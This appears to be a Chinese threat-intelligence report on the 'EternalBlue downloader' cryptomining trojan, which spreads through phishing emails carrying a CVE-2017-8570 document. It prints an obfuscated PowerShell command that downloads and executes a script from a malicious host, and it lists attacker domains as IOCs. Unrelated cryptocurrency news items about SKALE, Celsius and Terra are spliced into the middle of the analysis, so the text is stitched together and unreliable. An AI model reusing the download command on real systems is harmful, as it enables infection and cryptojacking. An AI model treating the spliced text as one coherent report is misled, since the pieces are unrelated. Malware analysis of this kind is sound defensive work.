“永恒之藍下載器木馬”新增釣魚郵件傳播，利用用戶機器挖礦門羅幣_TER

來源：騰訊御見威脅情報中心

編者注：原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播，附件含CVE-2017-8570漏洞攻擊代碼》

“永恒之藍”下載器木馬在感染用戶機器上運行后，會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔，該文檔附帶CVE-2017-8570漏洞攻擊代碼。

如果被攻擊用戶收到郵件并不慎打開文檔，就可能觸發漏洞執行Powershell命令下載mail.jsp：

以太坊側鏈SKALE與Web3社交平臺OIX達成合作:5月6日消息，以太坊側鏈SKALE與Web3社交平臺OIX達成合作。通過此次合作，OIX可以為用戶提供無成本、高性能的交易，從而提升用戶體驗和可擴展性。據悉，OIX支持來自圖像、視頻、音頻和3D的內容，包括增強現實和虛擬現實，并提供七種語言版本。通過其適合移動設備的社交信息源，用戶可以連接、社交、互動和交易所有類型的數字資產，而無需支付任何市場費用。[2023/5/6 14:46:58]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

Celsius 第二次聽證會時間推遲至北京時間 8 月 17 日 2:00:8月4日消息，借貸平臺 Celsius 在 Twitter 上表示，由其客戶組成的債權人委員會的工作正在推進中，應其要求第二次聽證會時間已由此前的 8 月 10 日延遲至北京時間 8 月 17 日 2:00，屆時將繼續推進訴訟程序。[2022/8/4 4:46:12]

而下載使用的域名ap35nf7.jp實際上并沒有注冊，但是依然能夠解析到地址：t.awcna.com，是因為被感染機器的本地hosts文件被篡改，使得隨機生成的域名映射到木馬使用的惡意地址，細節請參考御見威脅情報中心此前發布的報告：《“永恒之藍下載器”木馬篡改hosts指向隨機域名，再用多個漏洞攻擊內網挖礦》。

韓國法務部長官：檢方對Terra事件的調查重點是追蹤操縱比價的做市團隊:8月1日消息，韓國法務部長官、代表Luna-Terra事件受害者的律師韓東勛在最近接受采訪時表示：“檢方的調查首先瞄準了與Luna-Terra事件有關的做市團隊。利用代幣操縱行情的做市團隊追蹤結果將會成為調查的重點。”一位律師表示，“幣價上漲部分是因為購買勢頭，但發幣的基金會聘請的做市團隊隨意抬高價格的情況也有很多，如果通過這次調查能揭露做市團隊的全部細節，將會決定Do Kwon是否犯有欺詐等罪名。”

此前消息，韓國檢方在調查Terra事件中對加密交易所進行了一周的扣押搜查，現正對扣押材料進行全面分析，且正調查Terra是否通過自己借貸或抵押來夸大其交易量。（Edaily）[2022/8/1 2:51:00]

本次攻擊過程中，木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp經過高度混淆，多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行，并使用了新的計劃任務名：

“Bluetea“藍茶。

“永恒之藍”下載器木馬自出現之后從未停止更新，從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺，并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上，最初通過供應鏈攻擊積累一批感染機器后，又不斷利用”永恒之藍”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法進行擴散傳播，近期又增加了DGA域名攻擊和釣魚郵件攻擊，其最終目的只為利用用戶機器挖礦門羅幣獲利。

永恒之藍下載器木馬的歷次版本更新參考下表：

安全建議

1.建議用戶不要輕易打開不明來源的郵件附件，對于郵件附件中的文件要格外謹慎運行，如發現有腳本或其他可執行文件可先使用殺軟件進行掃描；

2.服務器使用安全的密碼策略，特別是IPC$、MSSQL、RDP賬號密碼，切勿使用弱口令，避免遭遇弱密碼爆破攻擊；

3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570，需進行漏洞掃描和修復，或采用WindowsUpdate進行。

IOCs

http//t.awcna.com/mail.jsp

Tags：TERTerraCOMPOWERTitan HuntersMonsterraCommunity Tokenhashpower

Fil